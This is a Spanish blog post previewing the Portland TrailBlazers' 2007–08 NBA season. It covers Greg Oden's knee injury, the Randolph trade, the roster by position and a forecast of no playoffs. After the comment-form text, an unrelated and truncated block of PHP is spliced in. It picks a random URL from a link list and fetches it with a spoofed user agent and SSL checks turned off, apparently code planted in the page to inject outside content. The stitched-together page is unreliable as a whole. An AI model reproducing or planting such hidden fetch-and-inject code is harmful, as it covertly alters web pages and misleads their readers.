Portland TrailBlazers: tocó Oden pero toca esperar otro año más

27 de September de 2007 por arivas

Ya son cuatro los años en los que Portland no asoma por los Playoffs y parece que habrá que sumar alguno más. Lejos queda ya aquella magnífica final de Conferencia contra los Lakers en el año 2000. Corren tiempos de reconstrucción.

Parecía que éste era su año de suerte: la lotería del draft les regaló el pick 1, la elección que todas las franquicias ansiaban, la elección que te proporcionaba uno de esos jugadores que pueden cambiar el rumbo de la franquicia, un jugador de ésos cuyo nombre se escucha ya desde un par de años antes de llegar a la universidad. Ese jugador iba a llegar a Portland. Evidentemente no hubo sorpresas y Portland eligió a Greg Oden, pívot de 2,13 de la universidad de Ohio State, todo un portento físico, gran intimidador, llamado a dominar las zonas en los próximos años.

Pero Oden cayó lesionado antes de debutar en la liga. Una lesión en el cartílago de su rodilla hará que pase prácticamente toda la temporada en blanco , lo cual deja a la franquicia de Oregon huérfana, sin el líder que debía reconducir al equipo de nuevo hacia el camino de los éxitos. Este vacío se acentúa, ya que el líder del equipo en los últimos años, Zach Randolph (23,6 puntos y 10 rebotes en la ultima temporada) fue traspasado junto a Dikau y F. Jones a NY en la noche del draft a cambio de Francis y Frye. El primero de ellos fue cortado días después, con lo cual quedaba clara la intención de los dirigentes de Portland de confiar desde esta temporada en los jóvenes acumulados en los tres últimos drafts e ir soltando lastre salarial poco a poco.

Sin Randolph el equipo pierde su principal referencia, y ante la ausencia de Oden es la generación llegada en 2007, con Brandon Roy (pick 6 y a la postre rookie del año) y LaMarcus Aldridge (pick 2) la que deberá asumir el protagonismo y confirmar las buenas sensaciones mostradas la temporada pasada.

La dirección de juego seguirá siendo responsabilidad de J. Jack, que se asentó en el puesto la temporada pasada con mas de 33 minutos por partido y consiguiendo medias de 12 puntos y 5 asistencias. Pero Jack no es jugador con mucho vuelo y no parece convencer del todo a MacMillan, que incluso probó con Roy en el puesto de PG, lo cual da opciones a Sergio Rodríguez, que después de una correcta temporada de rookie en la cual dejó muestras de su gran visión de juego (siempre estuvo entre los primeros en asistencias por 48 minutos, apartado en el cual terminó quinto de la liga) afronta una temporada que puede ser decisiva en su carrera. El rookie Green y Blake completan la nomina de bases.

Roy será el SG titular y el referente anotador del equipo. En su segundo año deberá asentarse en la liga y demostrar que puede ser una referencia para su equipo; en su primer año llego a los 16,8 puntos por partido y este año deberá aumentar estos números. Tras él aparece Webster, tirador llegado hace dos temporadas directamente desde el instituto y que tras dos temporadas de adaptación ya debe dar un paso y mejorar sus números, especialmente aportando puntos.

El puesto de SF queda en manos de dos jugadores atléticos: Darius Miles, que volverá tras una temporada apartado de las canchas por problemas físicos, y Outlaw, que deberá reafirmar las buenas sensaciones dejadas en el mes de abril en el que firmo 18,6 puntos por partido.

El juego interior estará comandado por la pareja Frye-Aldridge. Frye, llegado de NY después de un año irregular, contará con más minutos y deberá demostrar su nivel y recuperar las buenas sensaciones ofrecidas en su año rookie. Aldridge, llamado a ser la pareja interior de Oden en el futuro, tendrá que asumir responsabilidades desde el primer partido y convertirse en la referencia interior del equipo. En el banquillo esperan LaFrentz y Przybilla para demostrar que aún pueden ser importantes. Y mucho ojo con el rookie McRoberts, para muchos uno de los ‘robos’ del draft.

Así pues, se presenta una temporada complicada, pero presumiblemente el próximo verano volverán a tener una gran elección en el draft para unir a los Roy, Oden, Aldridge y compañía que, junto con el hueco salarial que van dejando el final de los contratos de Francis, LaFrentz y Miles, presentan una situación realmente interesante para el futuro de los Blazers.

Quinteto: Jack, Roy, Miles, Frye y Aldridge
Sexto hombre: Outlaw

 

Pronóstico: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>